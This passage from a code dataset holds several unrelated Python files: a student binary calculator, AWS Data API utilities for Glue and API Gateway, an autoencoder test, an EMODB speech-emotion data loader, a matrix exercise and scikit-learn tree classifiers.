bin_str_1[i] == '0' and bin_str_2[i] == '0':\n output = output + '1'\n carry = 0\n elif bin_str_1[i] == '1' and bin_str_2[i] == '1':\n output += '1'\n carry = 1\n else:\n output += '0'\n carry = 1\n if carry == 1:\n output += '1'\n return output[::-1]\n\n\ndef bin_sub(bin_str_1, bin_str_2):\n max_length = max(len(bin_str_1), len(bin_str_2))\n bin_str_1 = 
bin_str_1.zfill(max_length)[::-1]\n bin_str_2 = bin_str_2.zfill(max_length)[::-1]\n output = ''\n borrow = 0\n\n for i in range(max_length):\n num1 = bin_str_1[i]\n num2 = bin_str_2[i]\n \n if borrow == 1:\n if num1 == '1':\n num1 = '0'\n borrow = 0\n else:\n num1 = '1'\n if num1 == num2:\n output += '0'\n elif num1 == '1':\n output += '1'\n else:\n output += '1'\n borrow = 1\n\n if borrow == 1:\n return \"Error: Negative Result\"\n\n return output[::-1] \n\n\ndef bin_div(bin_str_1, bin_str_2):\n if bin_sub(bin_str_1, bin_str_2) == \"Error: Negative Result\":\n return \"Error: No fractions allowed\"\n \n output = ''\n result = ''\n\n for i, ch in enumerate(bin_str_1):\n result += ch\n sub_result = bin_sub(result, bin_str_2)\n\n if sub_result == \"Error: Negative Result\":\n output += '0'\n else:\n output += '1'\n result = sub_result\n \n return output\n\n\ndef bin_mul(bin_str_1, bin_str_2):\n output = ''\n\n for i, el in enumerate(reversed(bin_str_2)):\n if el == '1':\n multi_val = bin_str_1 + ('0' * i)\n output = bin_add(multi_val, output)\n\n return output\n\n\ndef hex_to_dec(hex_str):\n final_value = 0\n output = ''\n hex_dict = {\n '0' : 0,\n '1' : 1,\n '2' : 2,\n '3' : 3,\n '4' : 4,\n '5' : 5,\n '6' : 6,\n '7' : 7,\n '8' : 8,\n '9' : 9,\n 'A' : 10,\n 'B' : 11,\n 'C' : 12,\n 'D' : 13,\n 'E' : 14,\n 'F' : 15\n }\n\n for i, el in enumerate(hex_str):\n value = hex_dict[el]\n multiply = value * (16 ** (len(hex_str) - (i + 1)))\n final_value += multiply\n output = str(final_value)\n \n return output\n\n\ndef dec_to_hex(dec_num):\n output = ''\n count = 1\n values = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]\n keys = ['0','1','2','3','4','5','6','7','8','9','A','B','C','D','E','F']\n\n while count != 0:\n floor_div = int(dec_num) // 16\n remainder = int(dec_num) % 16\n index_value = values.index(remainder)\n hex_value = keys[index_value]\n output += hex_value\n dec_num = floor_div\n count = dec_num\n\n return output[::-1]\n\n\ndef hex_to_bin(hex_str):\n hex_dec_conv = hex_to_dec(hex_str)\n print(hex_dec_conv) \n\n dec_bin_conv = dec_to_bin(hex_dec_conv)\n\n return dec_bin_conv\n\ndef bin_to_hex(bin_str):\n bin_hex = bin_to_dec(bin_str)\n dec_hex = dec_to_hex(bin_hex)\n\n return dec_hex\n\n\ndef menu():\n print(\"\")\n print(\" *** Binary Calculator ***\")\n print(\"\")\n print(\"(B)inary to Decimal Conversion\")\n print(\"(Bi)nary to Hexidecimal Conversion\")\n print(\"(D)ecimal to Binary Conversion\")\n print(\"(De)cimal to Hexadecimal Conversion\")\n print(\"(N)egative Binary Conversion\")\n print(\"(H)exadecimal to Decimal Conversion\")\n print(\"(He)xadecimal to Binary Conversion\")\n print(\"(A)dd two Binary Numbers\")\n print(\"(S)ubtract two Binary Numbers\")\n print(\"(M)ultiply two Binary Numbers\")\n print(\" D(i)vide two Binary Numbers\")\n print(\"(Q)uit\")\n print(\"\\n\")\n\n\ndef input_one_check():\n user_input = input(\"Enter the first binary number : \")\n output = ''\n\n if user_input.isnumeric():\n for num in user_input:\n conv_num = int(num)\n if conv_num > 1 or conv_num < 0:\n print(\"Invalid digits, please use 1's and 0's\")\n continue_func()\n main()\n else:\n output += str(num)\n return output\n else:\n print(\"Invalid Binary\")\n continue_func()\n main()\n\n\ndef input_two_check():\n user_input = input(\"Enter the second binary number: \")\n output = ''\n\n if user_input.isnumeric():\n for num in user_input:\n conv_num = int(num)\n if conv_num > 1 or conv_num < 0:\n print(\"Invalid digits, please use 1's and 0's\")\n continue_func()\n main()\n else:\n 
output += str(num)\n return output\n else:\n print(\"Invalid Binary\")\n continue_func()\n main()\n\n\ndef main():\n while True:\n menu()\n choice = str(input('Enter choice from menu: ')).lower()\n print(\"\")\n if choice == 'b':\n print(\"\")\n bin_input = input(\"Enter Binary Number (8-digits): \")\n data = ''\n\n if bin_input.isnumeric():\n for num in bin_input:\n conv_num = int(num)\n if conv_num > 1 or conv_num < 0:\n print(\"Invalid digits, please use 1's and 0's\")\n continue_func()\n else:\n data += str(num)\n binary_value = bin_to_dec(data)\n print(f\"Decimal value of the entered binary: {binary_value}\")\n continue_func()\n else:\n print(\"Invalid Binary\")\n continue_func()\n elif choice == 'bi':\n bin_hex_input = input(\"Please enter a Binary number to convert: \")\n bin_hex_conv = bin_to_hex(bin_hex_input)\n print(f\"Hexidecimal value of the entered Binary: {bin_hex_conv}\")\n elif choice == 'n':\n negative_input = input(\"Enter in a binary number (0-124): \")\n n_data = ''\n\n if negative_input.isnumeric():\n for n_num in negative_input:\n negative_int = int(n_num)\n if negative_int > 1 or negative_int < 0:\n print(\"Invalid digits, please use 1's and 0's\")\n continue_func()\n else:\n n_data += str(n_num)\n negative_value = bin_inverse(n_data)\n print(f\"Decimal value of the entered binary: {negative_value}\")\n continue_func()\n else:\n print(\"Invalid Binary\")\n continue_func()\n elif choice == 'd':\n num_input = input(\"Enter a Decimal Number (0-255): \")\n if num_input.isnumeric():\n dec_int = int(num_input)\n if dec_int >= 0 and dec_int <= 255:\n dec_str = str(num_input)\n conv_dec = dec_to_bin(dec_str)\n print(f\"Binary value is: {conv_dec}\")\n continue_func()\n else:\n print(\"Decimal number out of range\")\n continue_func()\n else:\n print(\"\\nInvalid Decimal\")\n continue_func()\n elif choice == 'de':\n dec_conv_input = input(\"Enter a Decimal Number (0-255): \")\n\n if dec_conv_input.isnumeric():\n dec_hex_conv = dec_to_hex(dec_conv_input)\n print(f\"Hexadecimal value is: {dec_hex_conv}\")\n continue_func()\n else:\n print(\"Invalid Decimal\")\n continue_func()\n\n elif choice == 'h':\n hex_conv_input = input(\"Please enter a Hexadecimal: \")\n\n hex_dec_conv = hex_to_dec(hex_conv_input)\n print(f\"Your Hexadecimal converted to Decimal is: {hex_dec_conv}\")\n continue_func()\n\n elif choice == 'he':\n hex_input = input(\"Please enter a Hexadecimal to convert: \")\n hex_bin_conv = hex_to_bin(hex_input)\n print(f\"Binary value is: {hex_bin_conv}\")\n continue_func()\n\n\n elif choice == 'a':\n add_one = input_one_check()\n add_two = input_two_check()\n\n binary_addition = bin_add(add_one, add_two)\n print(f\"= {binary_addition}\")\n continue_func()\n elif choice == 's':\n sub_one = input_one_check()\n sub_two = input_two_check()\n\n binary_subtraction = bin_sub(sub_one, sub_two)\n print(f\"= {binary_subtraction}\")\n continue_func()\n elif choice == 'm':\n mul_one = input_one_check()\n mul_two = input_two_check()\n \n binary_multiplied = bin_mul(mul_one, mul_two)\n print(f\"= {binary_multiplied}\")\n continue_func()\n elif choice == 'i':\n div_one = input_one_check()\n div_two = input_two_check()\n\n binary_divide = bin_div(div_one, div_two)\n print(f\"= {binary_divide}\")\n \n continue_func()\n elif choice == 'q':\n print('Good Bye!')\n break\n else:\n 
continue","repo_name":"Andrewf9001/combined_projects_devpipline","sub_path":"binary_calc.py","file_name":"binary_calc.py","file_ext":"py","file_size_in_byte":9644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"31427247264","text":"import json\nimport datetime\nimport boto3\nimport os\nimport time\nimport logging\nimport pystache\nfrom distutils import util as _util\nfrom chalicelib.data_api_encoder import DataApiEncoder\nimport chalicelib.glue_export_dynamo_table as export_utils\nfrom chalicelib.exceptions import DetailedException, ResourceNotFoundException\nimport chalicelib.parameters as params\n\n_sts_client = None\n_iam_client = None\n\n\ndef setup_logging(set_name: str = None):\n logging.basicConfig()\n log = logging.getLogger(params.AWS_DATA_API_NAME if set_name is None else set_name)\n log.setLevel(params.DEFAULT_LOG_LEVEL)\n\n log_level = os.getenv(params.LOG_LEVEL_PARAM)\n if log_level is not None:\n log.info(f\"Setting Log Level to {log_level}\")\n log.setLevel(log_level.upper())\n\n return log\n\n\ndef __precheck_config(config_dict):\n # pre-check settings for the pystache template\n if config_dict.get(\"stage_name\").lower() != 'prod' or (\n config_dict.get(\"stage_name\").lower() == 'prod' and config_dict.get(\"enable_xray\") is True):\n config_dict[\"use_xray\"] = True\n\n if config_dict.get(\"auth\") is not None:\n config_dict[\"use_auth\"] = True\n\n if config_dict.get(\"cors_domain\") is not None:\n config_dict[\"custom_cors\"] = True\n\n if config_dict.get(\"auth\") == params.AUTHORIZER_COGNITO:\n if config_dict.get(\"cog_pool_name\") is not None and config_dict.get(\"cog_provider_arns\") is not None:\n config_dict[\"use_cognito\"] = True\n else:\n raise Exception(\"Misconfigured Cognito Authorization. 
Requires User Pool name and Provider ARNS\")\n\n if config_dict.get(\"custom_domain_name\") is not None:\n config_dict[\"custom_domain\"] = True\n\n if config_dict.get(\"custom_url_prefix\") is not None:\n config_dict[\"use_custom_prefix\"] = True\n\n\ndef generate_configuration_files(config_dict, generate_action, verbose):\n __precheck_config(config_dict)\n\n # generate the config.json file to .chalice\n if not os.path.exists(\".chalice\"):\n os.mkdir(\".chalice\")\n\n __export_template_to_file(\"template/config.pystache\", \".chalice/config.json\", config_dict, generate_action, verbose)\n\n # generate the iam policy\n __export_template_to_file(\"template/iam_policy.pystache\", \"iam_policy.json\", config_dict, generate_action, verbose)\n\n # generate the cors config\n if config_dict.get(\"allow_all_cors\") is True or config_dict.get(\"cors_domain\") is not None:\n __export_template_to_file(\"template/cors.pystache\", \"chalicelib/cors.json\", config_dict, generate_action,\n verbose)\n\n\ndef __export_template_to_file(template_file, output_file, config_doc, generate_action=None, verbose=False):\n # import the template file\n print(\"Target: %s\" % output_file)\n\n with open(template_file) as t:\n template = t.read()\n\n # create a renderer\n renderer = pystache.Renderer()\n\n rendered = renderer.render(template, config_doc)\n\n if generate_action != 'dry-run':\n # open the file for writing\n with open(output_file, 'w+') as out:\n out.write(rendered)\n\n out.close()\n\n print(\"Generated configuration successfully\")\n\n if verbose is True:\n print(rendered)\n\n\ndef identity_trace(f):\n def resolve_identity(self, *args, **kwargs):\n self._logger.debug(f\"Function: {f.__name__}\")\n self._logger.debug(f\"ARGS: {args}\")\n self._logger.debug(f\"KWARGS: {kwargs}\")\n\n # set the class' caller identity if we can get it\n try:\n if self._caller_identity is None:\n self._caller_identity = get_caller_identity()\n self._simple_identity = get_caller_simplename(self._caller_identity)\n except Exception as e:\n self._logger.error(e)\n\n # return the decorated function\n return f(self, *args, **kwargs)\n\n return resolve_identity\n\n\ndef strtobool(val):\n # wrapping distutils as I actually want a boolean\n return _util.strtobool(val) == 1\n\n\n# method to generate the ID for a metadata entry\ndef get_metaid(id):\n return f\"{id}-meta\"\n\n\n# method to return the name of the metadata table for a data API element\ndef get_metaname(name):\n return f\"{name}-Metadata\"\n\n\ndef remove_internal_attrs(dict):\n dict.pop(params.APP, None)\n dict.pop(params.LAST_UPDATED_BY, None)\n dict.pop(params.LAST_UPDATE_DATE, None)\n dict.pop(params.LAST_UPDATE_ACTION, None)\n dict.pop('api', None)\n dict.pop('type', None)\n\n\ndef _get_sts_client():\n global _sts_client\n if _sts_client is not None:\n return _sts_client\n else:\n _sts_client = boto3.client(\"sts\", region_name=get_region())\n\n return _sts_client\n\n\ndef get_region():\n return os.getenv('AWS_REGION')\n\n\ndef get_request_router_logger_name(stage: str) -> str:\n return f'RequestRouter-{stage}' if stage.lower() != 'prod' else 'RequestRouter'\n\n\ndef get_caller_account():\n return _get_sts_client().get_caller_identity()[\"Account\"]\n\n\ndef get_caller_simplename(_identity):\n return f\"{_identity['Account']}.{_identity['UserId']}\"\n\n\ndef get_caller_identity():\n return _get_sts_client().get_caller_identity()\n\n\ndef get_es_index_name(table_name, index_prefix):\n return 
f'{params.AWS_DATA_API_NAME.lower()}-{table_name.lower()}-{index_prefix.lower()}'\n\n\ndef get_es_type_name(table_name, index_prefix):\n return f'{table_name}-{index_prefix}'\n\n\n# method to generate an ARN for an Item in a table\ndef get_arn(id, table_name, deployed_account):\n return f\"{get_arn_base()}:{get_region()}:{deployed_account}:{table_name}:{id}\"\n\n\ndef versioned_arn(id, table_name, deployed_account, item_version):\n return f\"{get_arn(id, table_name, deployed_account)}:{item_version}\"\n\n\ndef shred_arn(arn):\n if \":\" not in arn:\n return None\n else:\n tokens = arn.split(\":\")\n\n def _get_arn(with_dict):\n d = {\n params.ARN_REGION: tokens[3],\n params.ARN_ACCOUNT: tokens[4],\n params.ARN_TABLE: tokens[5],\n params.ARN_ID: tokens[6]\n }\n\n if with_dict is not None:\n d.update(with_dict)\n\n return d\n\n if len(tokens) == 7:\n return _get_arn()\n elif len(tokens) == 8:\n return _get_arn({\n params.ITEM_VERSION: tokens[7]\n })\n else:\n return None\n\n\ndef get_arn_base():\n return f\"arn:aws:{params.AWS_DATA_API_SHORTNAME}\"\n\n\ndef decorate(content):\n return json.dumps(content, indent=4, cls=DataApiEncoder)\n\n\ndef get_time_now():\n return time.time()\n\n\ndef get_datetime_now():\n return datetime.datetime.now()\n\n\ndef get_date_now(fmt=None):\n if fmt is None:\n return get_datetime_now().strftime(params.DEFAULT_DATE_FORMAT)\n else:\n return get_datetime_now().strftime(fmt)\n\n\ndef get_table_name(table_name, deployment_stage):\n return f\"{table_name}-{deployment_stage}\"\n\n\ndef _get_client(name: str):\n return boto3.client(name, region_name=get_region())\n\n\ndef _get_glue_client():\n return _get_client('glue')\n\n\ndef create_s3_crawler(crawler_name, target_entity_name, crawler_rolename, catalog_db, s3_path, and_run=False):\n glue_client = _get_glue_client()\n\n try:\n glue_client.create_crawler(\n Name=crawler_name,\n Role=crawler_rolename,\n DatabaseName=catalog_db,\n Description=f'Crawler for S3 Data API Export {target_entity_name}',\n Targets={\n 'S3Targets': [\n {\n 'Path': s3_path\n }\n ],\n },\n # run every hour on the hour\n Schedule='cron(0 * * * ? 
*)',\n SchemaChangePolicy={\n 'UpdateBehavior': 'UPDATE_IN_DATABASE',\n }\n )\n except glue_client.exceptions.AlreadyExistsException:\n pass\n\n if and_run is True:\n glue_client.start_crawler(Name=crawler_name)\n\n return crawler_name\n\n\ndef get_all_data_apis():\n log = setup_logging()\n\n api_gw = _get_client(\"apigateway\")\n region = get_region()\n response = {}\n custom_domains = {}\n\n # load api custom domain names\n all_custom_domains = api_gw.get_domain_names()\n if \"items\" in all_custom_domains:\n for domain in all_custom_domains.get(\"items\"):\n if \"tags\" in domain and \"source\" in domain.get(\"tags\") and domain.get(\"tags\").get(\n \"source\") == params.AWS_DATA_API_NAME:\n # get base path mappings for the domain\n base_path_mappings = api_gw.get_base_path_mappings(domainName=domain.get(\"domainName\"))\n if base_path_mappings is not None and \"items\" in base_path_mappings:\n for path in base_path_mappings.get(\"items\"):\n custom_domains[path.get('restApiId')] = {\n \"api\": path.get('restApiId'),\n \"stage\": path.get('stage'),\n \"basePath\": path.get('basePath'),\n \"url\": domain.get(\"domainName\"),\n \"cf\": domain.get(\"distributionDomainName\")\n }\n\n # grab all rest API's and match them to Data API's\n all_apis = api_gw.get_rest_apis()\n if \"items\" in all_apis:\n for api in all_apis.get(\"items\"):\n if params.AWS_DATA_API_SHORTNAME in api.get(\"name\"):\n stage = api.get(\"name\").replace(f\"{params.AWS_DATA_API_SHORTNAME}-\", \"\")\n\n # TODO remove this restriction to support custom stage names\n if stage.lower() in ['dev', 'test', 'prod', 'int']:\n entry = {\n \"Endpoint\": f\"https://{api.get('id')}.execute-api.{region}.amazonaws.com\",\n \"Stage\": stage\n }\n\n # check for a custom domain name\n domain_info = custom_domains.get(api.get('id'))\n if domain_info is not None:\n entry[\"URL\"] = f\"https://{domain_info.get('url')}\"\n entry[\"DistributionDomainName\"] = domain_info.get(\"cf\")\n\n if domain_info.get('basePath') is not None and domain_info.get('basePath') != '(none)':\n entry[\"BasePath\"] = domain_info.get('basePath')\n\n response[stage] = entry\n\n return response\n\n\ndef verify_crawler(table_name, crawler_rolename, catalog_db):\n glue_client = _get_glue_client()\n\n try:\n glue_client.get_crawler(Name=table_name)\n except glue_client.exceptions.EntityNotFoundException:\n glue_client.create_crawler(\n Name=table_name,\n Role=crawler_rolename,\n DatabaseName=catalog_db,\n Description=f'Crawler for AWS Data API Table {table_name}',\n Targets={\n 'DynamoDBTargets': [\n {\n 'Path': table_name\n },\n ]\n },\n # run every hour on the hour\n Schedule='cron(0 * * * ? 
*)',\n SchemaChangePolicy={\n 'UpdateBehavior': 'UPDATE_IN_DATABASE',\n }\n )\n\n\ndef run_glue_export(table_name, s3_export_path, kms_key_arn, read_pct, log_path, export_role, dpu):\n glue_client = _get_glue_client()\n\n security_config = None\n try:\n crypt = {\n 'S3EncryptionMode': 'SSE-S3' if kms_key_arn is None else \"SSE-KMS\"\n }\n if kms_key_arn is not None:\n crypt['KmsKeyArn'] = kms_key_arn\n\n security_config = f\"{params.AWS_DATA_API_SHORTNAME}-ddb-export-config\"\n glue_client.create_security_configuration(\n Name=security_config,\n EncryptionConfiguration={\n 'S3Encryption': [crypt],\n 'CloudWatchEncryption': {\n 'CloudWatchEncryptionMode': 'DISABLED'\n },\n 'JobBookmarksEncryption': {\n 'JobBookmarksEncryptionMode': 'DISABLED'\n }\n }\n )\n except glue_client.exceptions.AlreadyExistsException:\n pass\n\n job_name = f\"{params.AWS_DATA_API_SHORTNAME}-{table_name}\"\n\n try:\n glue_client.create_job(\n Name=job_name,\n Description=f\"{params.AWS_DATA_API_NAME} Data Export to S3\",\n LogUri=log_path,\n Role=export_role,\n Command={\n 'Name': 'glueetl',\n 'ScriptLocation': f\"s3://awslabs-code-{get_region()}/{params.AWS_DATA_API_NAME}/glue_export_dynamo_table.py\",\n 'PythonVersion': '3'\n },\n MaxRetries=3,\n Timeout=1000,\n SecurityConfiguration=security_config\n )\n except glue_client.exceptions.IdempotentParameterMismatchException:\n # thrown when the job already exists\n pass\n\n def _argname(v):\n return f\"--{v}\"\n\n args = {\n _argname(export_utils.EXPORT_ARG_TABLE_NAME): table_name,\n _argname(export_utils.EXPORT_ARG_READ_PCT): str(read_pct),\n _argname(export_utils.EXPORT_ARG_PREFIX): s3_export_path,\n # only support compressed json formatting for now\n _argname(export_utils.EXPORT_ARG_FORMAT): \"json\"\n }\n\n try:\n response = glue_client.start_job_run(\n JobName=job_name,\n Arguments=args,\n AllocatedCapacity=dpu\n )\n\n if response is not None and 'JobRunId' in response:\n return {\n \"JobName\": job_name,\n \"JobRunId\": response['JobRunId']\n }\n else:\n return {\n \"Message\": \"Unable to start Glue Export or other error\"\n }\n except glue_client.exceptions.ConcurrentRunsExceededException as ce:\n raise DetailedException(message=\"Export Job Already Running\")\n\n\ndef get_running_export_jobs(job_name):\n glue_client = _get_glue_client()\n\n response = glue_client.get_job_runs(\n JobName=job_name\n )\n\n if response is None:\n raise ResourceNotFoundException(f\"Unable to resolve Job Name {job_name}\")\n else:\n running = []\n if 'JobRuns' in response:\n for j in response['JobRuns']:\n status = j['JobRunState']\n\n if not any(x in status for x in ['STARTING', 'RUNNING', 'STOPPING']):\n pass\n else:\n running.append(_extract_glue_job_status(j))\n\n return running\n\n\ndef _extract_glue_job_status(job):\n output = {\n \"Status\": job['JobRunState'],\n \"Started\": job['StartedOn'].strftime(params.DEFAULT_DATE_FORMAT),\n 'ExecutedDuration': job['ExecutionTime']\n }\n\n if 'CompletedOn' in job:\n output['Completed'] = job['CompletedOn'].strftime(params.DEFAULT_DATE_FORMAT)\n\n if 'ErrorMessage' in job:\n output['ErrorMessage'] = job['ErrorMessage']\n\n if 'Arguments' in job:\n output['Arguments'] = job['Arguments']\n\n return {job['Id']: output}\n\n\ndef get_glue_job_status(job_name, run_id):\n glue_client = _get_glue_client()\n\n try:\n response = glue_client.get_job_run(\n JobName=job_name,\n RunId=run_id\n )\n\n if response is not None:\n return _extract_glue_job_status(response['JobRun'])\n except glue_client.exceptions.EntityNotFoundException:\n raise 
ResourceNotFoundException(\"Unable to resolve Job Name or Run ID\")\n","repo_name":"awslabs/aws-data-api","sub_path":"chalicelib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":15507,"program_lang":"python","lang":"en","doc_type":"code","stars":102,"dataset":"github-code","pt":"60"} +{"seq_id":"32311442269","text":"import sys\n\nsys.path.append(\"../src\")\n\nimport torch\nimport torch.nn as nn\nfrom models.autoencoder import AutoEncoder, RMSELoss\nfrom data_preparation import DataPreparation\nimport configures_manner\n\ndata_infos = {\n \"repo\": \"p971074907\",\n \"path\": \"brl:rn\",\n \"inputFeatures\": \"date:newDeaths\",\n \"inputWindowSize\": \"7\",\n \"begin\": \"2020-03-13\",\n \"end\": \"2020-07-15\",\n}\nconfigures_manner.add_all_configures_to_globals(data_infos)\n\nrepo = \"p971074907\"\npath = \"brl:rn\"\ninputFeatures = \"date:newDeaths\"\ninputWindowSize = \"7\"\nbegin = \"2020-03-13\"\nend = \"2020-07-15\"\n\ndata_instance = DataPreparation()\ndata = data_instance.get_data(repo, path, inputFeatures, inputWindowSize, begin, end)\n\nforward_len = 7\ndata_instance.data_tensor_generate(forward_len)\n\nprct_to_train = 0.7\ndata_instance.train_test_split_by_percent(prct_to_train)\n\nbatch_s = 8\ndata_instance.dataloader_create(batch_s)\n\nmodel_hyperparameters = {\n \"inseqlen\": 7,\n \"outseqlen\": 7,\n \"growth\": 4,\n \"latent_space_dim\": 7,\n \"n_features\": 1,\n \"n_targets\": 1,\n \"ae_archtecture_list\": [20, 30, 50],\n \"activation\": \"ReLU\",\n \"epochs\": 100,\n \"seed\": 51,\n \"learning_rate\": 0.0005,\n}\n\nmodel = AutoEncoder(model_hyperparameters)\nmodel.train(data_instance)\nprint(\"Model Trained\")\n\nto_predict = data_instance.X_test\npred = model.predicting(to_predict)\n\nmodel.save_model()\nytrue = data_instance.Y_test\nyhat = pred\n\ns, ss = model.score_calculator(ytrue, yhat)\nprint(s, ss)\n","repo_name":"Natalnet/ncovid-miae-forecast","sub_path":"tests/test_autoencoder.py","file_name":"test_autoencoder.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"25163447835","text":"import os, torch\nimport torchaudio\nimport pandas as pd\nimport numpy as np\nfrom torchaudio.transforms import Resample\nfrom torch.utils.data import Dataset, DataLoader\nfrom transformers import Wav2Vec2FeatureExtractor\n\n\ns = \\\n\"\"\"\n03 : male, 31 years old\n08 : female, 34 years\n09 : female, 21 years\n10 : male, 32 years\n11 : male, 26 years\n12 : male, 30 years\n13 : female, 32 years\n14 : female, 35 years\n15 : male, 25 years\n16 : female, 31 years\n\"\"\"\n\nactor_dict = {}\nfor sent in s.split(\"\\n\"):\n if len(sent) > 0:\n sent = sent.split(\":\")\n key = sent[0].strip()\n value = sent[1].split(\",\")[0].strip()\n actor_dict[key] = value\n\n\nclass EMODBDataset(Dataset):\n def __init__(self, \n data_path = \"//home/nl438/rds/hpc-work/PROJECT/data/emodb_data/wav/\",\n iemocap_only = True,\n set = \"train\"):\n self.audio_path = data_path\n\n self.emotion_dict = {'A' : \"fear\",\n 'E': \"disgust\",\n \"L\" : \"boredom\",\n \"T\" : \"sadness\",\n \"W\": \"anger\",\n \"F\": \"joy\",\n \"N\": \"neutral\"\n }\n\n if iemocap_only:\n self.emodb2iemocap = {\"sadness\": \"sad\",\n \"anger\": \"ang\",\n \"joy\": \"hap\",\n \"neutral\": \"neu\"\n }\n self.class_dict = {\"neu\": 0, \"hap\": 1, \"ang\": 2, \"sad\": 3}\n else:\n self.emodb2iemocap = {\"sadness\": \"sad\",\n \"anger\": \"ang\",\n \"joy\": \"hap\",\n \"neutral\": \"neu\",\n \"sor\": \"sur\"\n }\n 
self.class_dict = {\"neu\": 0, \"hap\": 1, \"ang\": 2, \"sad\": 3, \"sur\": 4} \n self.id2emo = {v:k for k,v in self.class_dict.items()}\n self.wavs = []\n self.labels = []\n self.names = []\n self.glabels = []\n if set == \"train\":\n self.actors = [ \"11\", \"12\", \"13\", \"14\", \"15\", \"16\"]\n if set == \"test\":\n self.actors = [\"03\", \"08\", \"09\", \"10\" ]\n self.load()\n\n def __len__(self,):\n return len(self.wavs)\n\n def load(self):\n wavs = []\n labels = []\n audio_files = sorted(os.listdir(self.audio_path))\n pname = audio_files[0]\n for audio_file in audio_files[1:]:\n full_audio_file = os.path.join(self.audio_path, audio_file)\n actor = audio_file[:2]\n emo_label = self.emotion_dict[audio_file[5]]\n if actor in self.actors and emo_label in self.emodb2iemocap and pname[:6]!=audio_file[:6]:\n wav, sr = torchaudio.load(full_audio_file)\n wav = wav.squeeze(0)\n label = self.class_dict[self.emodb2iemocap[emo_label]]\n wavs.append(wav)\n labels.append(label)\n self.glabels.append(actor_dict[actor][0] + str(label))\n self.names.append(pname)\n pname = audio_file\n else:\n pname = audio_file\n continue\n\n \n\n self.wavs = wavs\n self.labels = labels\n\n def __getitem__(self, \n id):\n audio = self.wavs[id]\n label = self.labels[id]\n audio_len = len(audio)\n return audio, audio_len, label\n \n \nSAMPLE_RATE = 16000\nMIN_SECOND = 0.05\ndef wav_transform( wavs,\n wavs_len):\n original_wavs_len = wavs_len\n if max(original_wavs_len) < MIN_SECOND * SAMPLE_RATE:\n padded_samples = int(MIN_SECOND * SAMPLE_RATE) - max(original_wavs_len)\n wavs = torch.cat(\n (wavs, wavs.new_zeros(wavs.size(0), padded_samples)),\n dim=1,\n )\n print(wavs_len)\n wavs_len = wavs_len + padded_samples\n\n wavs_list = []\n for wav, wav_len in zip(wavs, wavs_len):\n wavs_list.append(wav[:wav_len].numpy())\n\n max_wav_len = int(max(wavs_len)) \n return wavs_list, original_wavs_len, max_wav_len\n\n\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\n\nclass EMODBCollator():\n def __init__(self,\n path,\n return_attention_mask=True,\n do_normalize=True,\n sample_rate=16000):\n \n self.sample_rate = sample_rate\n self.feature_extractor = Wav2Vec2FeatureExtractor.from_pretrained(path,\n return_attention_mask=return_attention_mask,\n do_normalize=do_normalize)\n\n\n def __call__(self,\n samples):\n\n wavs, wavs_len, labels = list(zip(*samples)) \n labels = torch.LongTensor(labels)\n wavs_list, _, _ = wav_transform(wavs, wavs_len)\n input_values = self.feature_extractor(\n wavs_list,\n return_tensors=\"pt\",\n padding=True,\n return_attention_mask=True,\n sampling_rate=self.sample_rate)\n\n\n \n return {\"input_values\": input_values[\"input_values\"], \n \"attention_mask\": input_values[\"attention_mask\"],\n \"labels\": labels}","repo_name":"NLashkarashvili/Thesis","sub_path":"data_prep/EMODB/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":5372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"72783930111","text":"def calc_matrix(n,matrix):\n sum1,sum2=0,0\n for i in range(0,n):\n for j in range(0,n):\n if i==j:\n sum1=sum1+matrix[i][j]\n if (i+j)==n-1:\n sum2=sum2+matrix[i][j]\n else:\n continue\n print(abs(sum1-sum2))\nn=int(input())\nmatrix=[]\nfor i in range(0,n):\n element=[int(i) for i in input().split()]\n matrix.append(element)\ncalc_matrix(n,matrix)\n 
","repo_name":"abhaykatheria/cp","sub_path":"HackerRank2/Matrix.py","file_name":"Matrix.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"2933661748","text":"import time\nimport numpy as np\nimport pandas as pd\nfrom sklearn import metrics, preprocessing\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nfrom sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor\nfrom sklearn.ensemble import RandomForestClassifier, RandomForestRegressor\n\n\ndef classification_tree(X_train, X_test, y_train, y_test):\n print(\"------------------ C - 1 - Classification Tree ------------------\")\n\n model_start_time = time.time()\n\n # Create a dictionary of all the parameter options\n param_grid = {'criterion': ['gini'],\n 'max_leaf_nodes': list(range(2, 100)),\n 'max_depth': [13, 14, 15, 16],\n 'min_samples_split': [2, 3, 4, 5]}\n\n # Create a grid search object\n gsDCT = GridSearchCV(DecisionTreeClassifier(), param_grid,\n cv=5, scoring='accuracy')\n\n # Fit the grid search\n gsDCT.fit(X_train, y_train)\n\n print(gsDCT.best_estimator_)\n\n # Predict the response for test dataset\n y_pred = gsDCT.predict(X_test)\n\n elapsed_time = time.time() - model_start_time\n print('Elapsed Time : {}', time.strftime(\"%H:%M:%S\", time.gmtime(elapsed_time)))\n\n # Model Accuracy, how often is the classifier correct?\n print(\"Accuracy :\", metrics.accuracy_score(y_test, y_pred))\n\n\ndef classification_forest(X_train, X_test, y_train, y_test):\n print(\"------------------ C - 1 - Classification Forest ------------------\")\n model_start_time = time.time()\n # Hyperparameter grid\n param_grid = {\n 'n_estimators': [80, 100, 150, 180], # The number of trees in the forest.\n 'max_depth': [10, 20, 30], # The maximum depth of the tree.\n 'max_features': ['sqrt'], # he number of features to consider when looking for the best split\n 'min_samples_split': [2, 5, 9, 10], # The minimum number of samples required to split an internal node\n 'bootstrap': [True] # Whether bootstrap samples are used when building trees.\n }\n\n # Create a grid search object\n gsRFC = GridSearchCV(RandomForestClassifier(), param_grid, n_jobs=-1,\n scoring='accuracy', cv=5)\n\n # Fit\n gsRFC.fit(X_train, y_train)\n print(gsRFC.best_params_)\n\n best_model = gsRFC.best_estimator_\n random_pred = best_model.predict(X_test)\n\n elapsed_time = time.time() - model_start_time\n print('Elapsed Time : {}', 